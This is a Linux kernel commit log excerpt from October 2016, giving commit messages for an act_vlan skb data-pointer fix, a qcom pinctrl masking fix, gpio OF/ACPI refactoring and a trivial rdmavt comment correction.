2016-10-04	net/sched: act_vlan: Push skb->data to mac_header prior calling skb_vlan_*() ↵	Shmulik Ladkani	1	-0/+9
	functions Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the case where the input skb data pointer does not point at the mac header: - They're doing push/pop, but fail to properly unwind data back to its original location. For example, in the skb_vlan_push case, any subsequent 'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes BEFORE start of frame, leading to bogus frames that may be transmitted. - They update rcsum per the added/removed 4 bytes tag. Alas if data is originally after the vlan/eth headers, then these bytes were already pulled out of the csum. OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header present no issues. act_vlan is the only caller to skb_vlan_() that has skb->data pointing at network header (upon ingress). Other calles (ovs, bpf) already adjust skb->data at mac_header. This patch fixes act_vlan to point to the mac_header prior calling skb_vlan_() functions, as other callers do. Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com> Cc: Daniel Borkmann <daniel@iogearbox.net> Cc: Pravin Shelar <pshelar@ovn.org> Cc: Jiri Pirko <jiri@mellanox.com> Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04	pinctrl: qcom: fix masking of pinmux functions	John Crispin	1	-1/+1
	The following commit introduced a regression by not properly masking the calculated value. Fixes: 47a01ee9a6c3 ("pinctrl: qcom: Clear all function selection bits") Signed-off-by: John Crispin <john@phrozen.org> Reviewed-by: Bjorn Andersson <bjorn.andersson@linaro.org> Reviewed-by: Stephen Boyd <stephen.boyd@linaro.org> Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
2016-10-03	gpio: add missing static inline	Linus Walleij	1	-3/+7
	of_get_named_gpiod_flags() was missing a static inline version when compiling without OF_GPIO. Add this. Reported-by: kbuild test robot <fengguang.wu@intel.com> Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
2016-10-03	gpio: OF: localize some gpiochip init functions	Linus Walleij	2	-5/+4
	of_gpiochip_add() and of_gpiochip_remove() are only used locally in the gpio subsystem so move these functions to the local header. Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
2016-10-03	gpio: acpi: separation of concerns	Linus Walleij	4	-59/+63
	The generic GPIO library directly implement code for acpi_find_gpio() which is only used with CONFIG_ACPI. This was probably done because OF did the same thing, but I removed that so remove this too. Rename the internal acpi_find_gpio() in gpiolib-acpi.c to acpi_populate_gpio_lookup() which seems to be more appropriate anyway so as to avoid a namespace clash with the same function. Make the stub return -ENOENT rather than -ENOSYS (as that is for syscalls!). For some reason the sunxi pin control driver was including the private gpiolib header, it works just fine without it so remove that oneliner. Cc: Rafael J. Wysocki <rafael.j.wysocki@intel.com> Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com> Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
2016-10-03	IB/rdmavt: Trivial function comment corrected.	Parav Pandit	1	-1/+1
	Corrected function name in comment from qib_ to rvt_. Signed-off-by: Parav Pandit <pandit.parav@gmail.com> Signed-off-by: Doug Ledford <dledford@redhat.com>
2016-10-03	gpio: OF: separation of concerns	Linus Walleij	3	-39/+55
	The generic GPIO library directly implement code for of_find_gpio() which is only used with CONFIG_OF and causes compilation problems on archs that do not even have stubs for OF functions, especially on UM that does not implement any IO remap functions. Move the function to gpiolib-of.c, implement a static inline stub in gpiolib.h returning PTR_ERR(-ENOENT) if CONFIG_OF_GPIO is not set and be done with it. Signed-off-by: Linus Walleij <linus.walleij@linaro.org>